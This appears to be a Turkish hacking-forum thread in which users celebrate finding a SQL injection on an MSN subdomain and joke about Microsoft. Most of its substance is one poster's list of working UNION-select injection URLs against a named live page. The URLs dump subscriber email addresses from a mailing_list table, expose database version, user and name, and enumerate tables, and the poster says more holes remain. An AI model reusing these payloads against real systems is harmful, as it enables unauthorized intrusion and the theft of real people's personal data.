Msn.Com Sql İnjection
-
sitedeki kamillerin mailleri subdomaindir.
-
Sql Injection Fakiri ilgay :)
-
ooo yeah bu hızda devam edersen,geleceğini iyi görüyorum senin hoca.Taktir ediyorum :).
-
ne geleceği fQ..adam milw0rm çocuu oldu:D
-
Vay beee microsoft php kullanıyor :) ilk defa dikkatimi cekti..
-
şapka çıkartırım bu olaya bravo EcHoLL
bana "php" ve "asp.net" de sql injeksiyon ile ilgili döküman önerecek olna varmı bakın asp demiyorum gerçekten şözmek istiyorum birde mesela bulunamayan column ve table adlarına ne gibi yöntemler uygulanıyor piyasada var ama hep sadece .asp üzerine basit unclosed dir cart curt ben php ve asp.net de çözmek istiyorum yabancı sitelerde dende bulamadım dil yok -
ben firefox kullandıklarını bile gördüm..bi ss wardı nasıl indirileceğini anlatıyordu orda gördüm.bill gates pardus kullanıyo die söylentiler bile war:D
-
Nitrous bunu yazdı:
-----------------------------
ben firefox kullandıklarını bile gördüm..bi ss wardı nasıl indirileceğini anlatıyordu orda gördüm.bill gates pardus kullanıyo die söylentiler bile war:D
-----------------------------
koptumya :) muhamhuamhua bilgates pardusmu kullanıyoruş :) ben MAC diye duymuştum pardusamı geçmiş vay ipina -
kurcalansa çok şey çıkar bundan.
-
Alalala... :) Bunu ben geçen hafta bulmuştum hatta holy le biraz kurcalamistik bi holy_one & Rene ve benim gerçek hayattan 2 arkm biliodu bitek :D Başkalarida farketti demekki.. :) neyse madem ortaya çıktı burasi :) Ozaman buyrun beyler bende yazim çıkarttıklarımı... :):)
Mail ler :
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,@@version+from+mailing_list%20limit%201,900000000
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,user()%20+from+mailing_list%20limit%201,900000000
Versiyonlar ve Mailler :
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,%20email%20,3,4,5,6,concat(user(),ascii(32),@@version)%20+from+mailing_list%20limit%201,10
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,email,3,4,5,6,7+from+mailing_list%20limit%201,900000000
İşlem Yapılan Tablo İsimleri :
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,2,3,4,5,6,7
Database İsmi :
http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,database(),3,4,5,6,7
Db Deki Genel Tablo İsimleri :
http://business.za.msn.com/msn/view_article.php?id=99999+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables
Database İçindeki Tablolar :
http://business.za.msn.com/msn/view_article.php?id=99999+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables+where+table_schema=char(109,97,114,107,101,116,118,105,101,119,115,50)
Daha yapilcak çok şey varda :) + Şunuda söyliyim çok bölümünde dha sql injection var sistemin :)
-
TR_ip bunu yazdı:
-----------------------------yuh be gnka vur dedik öldürmüşsün :D
bide daha bissürü sql varmışmış :|
google dan bişeler çıkartmanda yakındır haa :|
